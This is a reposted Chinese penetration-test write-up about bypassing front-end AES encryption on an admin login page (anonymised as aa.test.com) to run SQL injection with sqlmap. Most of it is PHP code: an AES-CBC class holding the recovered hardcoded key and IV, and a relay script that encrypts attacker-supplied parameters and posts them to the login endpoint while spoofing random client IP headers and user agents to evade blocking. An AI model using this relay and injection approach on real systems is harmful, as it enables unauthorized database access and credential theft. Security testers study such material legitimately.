【转】众测厂商某站点绕过前端加密进行注入

0x01 概要

站点：http://aa.test.com:8088/Admin/Login，这样看起来是一个挺正常的界面，测试一下发现存在注入

很清楚的可以看到两张图片是有明显的区别的，说明有注入

 

抓包时发现用户和密码进行前段加密了！！！！

0x02 查看前端加密方式

前端加密的话，那就只需要找到对应前端加密脚本即可

 

0x03 编码对应解密脚本

 

# AES加解密脚本：

<?php

/**

 * AES/CBC/PKCS5Padding模式 加密解密

 */

class Crypt {

    /**

     * [$cipher 加密模式]

     * @var [type]

     */

    private $cipher = MCRYPT_RIJNDAEL_128;

    private $mode = MCRYPT_MODE_CBC;

    /**

     * [$key 密匙]

     * @var string

     */

    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**

     * [$iv 偏移量]

     * @var string

     */

    private $iv = '123456789ABCDEFG';

    function setCipher($cipher=''){

        $cipher && $this->cipher = $cipher;

    }

    function setMode($mode=''){

        $mode && $this->mode = $mode;

    }

    function setSecretKey($secret_key=''){

        $secret_key && $this->secret_key = $secret_key;

    }

    function setIv($iv=''){

        $iv && $this->iv = $iv;

    }

    //加密

    function encrypt($str)

{      

        $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );

        $str = $this->pkcs5Pad ( $str, $size );

        $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);

        //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值

        $data=strtolower(bin2hex($data));

        return $data;

    }

    //解密

    function decrypt($str)

{

        $str = $this->hex2bin( strtolower($str));

        $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );

        $str = $this->pkcs5Unpad( $str );

        return $str;

    }

    //bin2hex还原

    private function hex2bin($hexData)

{

        $binData = "";

        for($i = 0; $i < strlen ( $hexData ); $i += 2)

        {

            $binData .= chr(hexdec(substr($hexData, $i, 2)));

        }

        return $binData;

    }

    //PKCS5Padding

    private function pkcs5Pad($text, $blocksize)

{

        $pad = $blocksize - (strlen ( $text ) % $blocksize);

        return $text . str_repeat ( chr ( $pad ), $pad );

    }

    private function pkcs5Unpad($text)

{

        $pad = ord ( $text {strlen ( $text ) - 1} );

        if ($pad > strlen ( $text ))

            return false;

        if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)

            return false;

        return substr ( $text, 0, - 1 * $pad );

    }

}

echo (new Crypt())->encrypt('111');

可以看得到是一致的，那就可以正常注入了

# 注入脚本：‍

<?php

/**

 * AES/CBC/PKCS5Padding模式 加密解密

 */

class Crypt {

    /**

     * [$cipher 加密模式]

     * @var [type]

     */

    private $cipher = MCRYPT_RIJNDAEL_128;

    private $mode = MCRYPT_MODE_CBC;

    /**

     * [$key 密匙]

     * @var string

     */

    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**

     * [$iv 偏移量]

     * @var string

     */

    private $iv = '123456789ABCDEFG';

    function setCipher($cipher=''){

        $cipher && $this->cipher = $cipher;

    }

    function setMode($mode=''){

        $mode && $this->mode = $mode;

    }

    function setSecretKey($secret_key=''){

        $secret_key && $this->secret_key = $secret_key;

    }

    function setIv($iv=''){

        $iv && $this->iv = $iv;

    }

    //加密

    function encrypt($str)

{      

        $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );

        $str = $this->pkcs5Pad ( $str, $size );

        $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);

        //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值

        $data=strtolower(bin2hex($data));

        return $data;

    }

    //解密

    function decrypt($str)

{

        $str = $this->hex2bin( strtolower($str));

        $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );

        $str = $this->pkcs5Unpad( $str );

        return $str;

    }

    //bin2hex还原

    private function hex2bin($hexData)

{

        $binData = "";

        for($i = 0; $i < strlen ( $hexData ); $i += 2)

        {

            $binData .= chr(hexdec(substr($hexData, $i, 2)));

        }

        return $binData;

    }

    //PKCS5Padding

    private function pkcs5Pad($text, $blocksize)

{

        $pad = $blocksize - (strlen ( $text ) % $blocksize);

        return $text . str_repeat ( chr ( $pad ), $pad );

    }

    private function pkcs5Unpad($text)

{

        $pad = ord ( $text {strlen ( $text ) - 1} );

        if ($pad > strlen ( $text ))

            return false;

        if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)

            return false;

        return substr ( $text, 0, - 1 * $pad );

    }

}

class SqlCurl

{

    public function curlRequest($url, $post = [], $cookie = '', $referurl = '')

{

        if (!$referurl) {

            $referurl = 'https://www.baidu.com';

        }

   

        $header = array(

            'CLIENT-IP:' . $this->getIp(),

            'X-FORWARDED-FOR:' . $this->getIp(),

            'HTTP_CLIENT_IP:' .$this->getIp(),

            'HTTP_X_FORWARDED_FOR' . $this->getIp(),

            'REMOTE_ADDR:' . $this->getIp(),

            'Content-Type:application/x-www-form-urlencoded',

            'X-Requested-With:XMLHttpRequest',

        );

   

        $curl = curl_init();

        curl_setopt($curl, CURLOPT_URL, $url);

        //随机浏览器useragent

        curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());

        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);

        curl_setopt($curl, CURLOPT_AUTOREFERER, 1);

        curl_setopt($curl, CURLOPT_REFERER, $referurl);

        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);

   

        if ($post) {

            curl_setopt($curl, CURLOPT_POST, 1);

            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));

        }

   

        if ($cookie) {

            curl_setopt($curl, CURLOPT_COOKIE, $cookie);

        }

   

        curl_setopt($curl, CURLOPT_TIMEOUT, 10);

        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

        $data = curl_exec($curl);

   

        if (curl_errno($curl)) {

            return curl_error($curl);

        }

   

        curl_close($curl);

        return $data;

    }

   

    private function getIp()

{

        return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);

    }

    private function agentArry()

{

        $agentarry = [

            //PC端的UserAgent

            "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",

            "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",

            "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",

            "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",

            "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",

            "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",

            "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",

            "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",

            "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",

            "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",

            "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",

            "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",

            "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",

            "傲游（Maxthon）" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",

            "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",

            "世界之窗（The World） 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",

            "世界之窗（The World） 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",

            "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",

            "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",

            "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",

            "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",

            //移动端口

            "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",

            "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",

            "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",

            "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",

            "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",

            "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",

            "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",

            "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",

            "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",

            "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",

            "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",

            "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",

            "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",

        ];

        return $agentarry[array_rand($agentarry, 1)];

    }

}

// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#

$data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);

$data['Password'] = (new Crypt())->encrypt($_GET['Password']);

echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);

0x04 Sqlmap正常注入

 

 转载于：https://mp.weixin.qq.com/s/NU3FSWbF-kV0TkYqe9jEGg